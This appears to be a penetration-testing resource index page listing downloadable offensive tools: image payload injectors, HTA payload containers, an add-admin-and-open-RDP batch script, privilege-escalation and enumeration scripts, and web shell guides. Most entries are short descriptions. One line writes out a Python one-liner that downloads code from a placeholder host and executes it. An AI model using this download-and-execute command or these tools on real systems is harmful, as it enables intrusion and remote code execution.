The Cloud Source for Client Engagement Resources
Scripts and Code Snipets
Stand-Alone Exploits
ora-pwn
PS used to bruteforce SIDs, user credentials, execute queries, and triggering NTLM auth attempts against a tgt Download
Image Payload Injection:
- Injecting PS into a BMP image Download
- Injecting payloads into JPG image Download
Python 1-Line Download/Exec: - python -c 'import urllib2;r=urllib2.urlopen("www.badcontent.com/a");exec(r.read())'
Pre-Built Containers for Payloading
Generic HTA container
Generic container for altering - includes launcher carve out. Download
Shell Code Assistance:
Shell Code Parser and Documenter:
PS / Bash / PY /WSH / VB Scripts
Bash - Entity Enum Script
Various enum collections against tgt domain and IP range. Download
Win Batch - Add User.bat
scripted commands to add a specified user and associated password to local host, move to Admins group, and Start / open RDP (incl FW hole) Download
Linux Local Privs Checker / Escalation Tool
Script runs on local Linux hosts and enumerates world writable spaces and checks for common escalation options Download
Bash - Weak SSL Detection Script
Loops through a target listing of domains searching for weak SSL ciphers Download
Bash - DNS Dump
Brute forces DNS lookup against a domain using the 120+ most common host names (usage: dnsdump.sh -x {domain.tld} ) Download
Bash - eyespy.sh
Scripted nmap scan for Expected Eyewitness ports | results to Eyewitness Download
MSF Go-To Exploits
Sample xxxx Code
This codes does stuff. Download
Tools and Job Aids
nmap XML --> Reporting
converts nmap.xml files into a format Access can Import and Generate canned Rpts. Download
Creating A Scheduled Task via CLI Download
Deploying Web Shells
Resources and example guide for simple web shell deployments
Pentest-Zen (ExitC0de00c.com)
